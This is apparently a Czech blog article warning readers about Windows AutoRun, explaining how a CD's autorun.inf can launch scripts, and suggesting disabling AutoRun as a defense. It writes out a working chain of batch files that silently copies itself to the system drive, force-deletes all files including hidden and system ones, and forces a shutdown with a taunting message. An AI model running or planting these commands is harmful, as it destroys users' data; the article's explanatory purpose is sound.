TIP: Přetáhni ikonu na hlavní panel pro připnutí webu
Chcete se dozvědět, jaké nebezpečí vám hrozí kvůli zapnutému AutoRunu? Čtěte dál.
AutoRun zajišťuje automatické načtení média při vložení do PC, znáte to například z různých CD/DVD, co se přidávájí k herním časopisům, po vložení CD Vám automaticky naběhne většinou menu. Říkáte si, že je to v pořádku, ale teď si vemte, že to někdo přenastaví tak, aby se místo zobrazení nějakého menu vykonal nějaký příkaz, třeba DEL /F /S /Q /A:RSHA *.*, to by jistě nebylo moc příjemné.
Nejdříve bych vysvětlil, jak to vlastně funguje. Představte si, že na CD máte tyto 3 soubory: „autorun.inf“, „script.cmd“ a „script2.cmd“. Při vložení CD se zpracuje soubor „autorun.inf“. „Autorun.inf“ může obsahovat třeba:
[AutoRun]
open=script.cmdTo znamená, že otevře (spustí) soubor script.cmd; ve script.cmd může být prakticky cokoliv, třeba toto:
@ECHO OFF
COPY "script2.cmd" "%systemdrive%\script2.cmd" /Y
START "%systemdrive%\script2.cmd" /B@ECHO OFF skrývá příkazy, copy kopíruje soubor script2.cmd do %systemdrive% (nejčastěji C:). START spouští script2.cmd už z pevného disku (je to „ochrana“, kdyby uživatel vyndal CD), „/B“ je přepínač, který zajistí, aby se spustila aplikace bez vytvoření nového okna, v našem případě script2.cmd.
A konečně jdeme na obsah souboru script2.cmd, ten v sobě může obsahovat naprosto cokoliv. Třeba:
@ECHO OFF
DEL /F /S /Q /A:RSHA *.*
SHUTDOWN -s -f -t 5 -c "n00b!"shutdown vypne počítač za 5 sekund, zobrazí komentář „n00b!“. Toto je důvod, proč tento článek píšu. Můžete takto lehce přijít o svá data, ale mezi námi, s tímto způsobem ztráty dat se potýkáme velice málo…
Obrana
Jsem obeznámen se dvěma metodami prevence:
- Nepoužívat Windows.
- Vypnout v registrech AutoRun (skript na vypnutí AutoRunu; skript na zapnutí AutoRunu).
Toť vše, případné dotazy do komentářů.
Příští téma – msgina.dll a fakegina.dll.
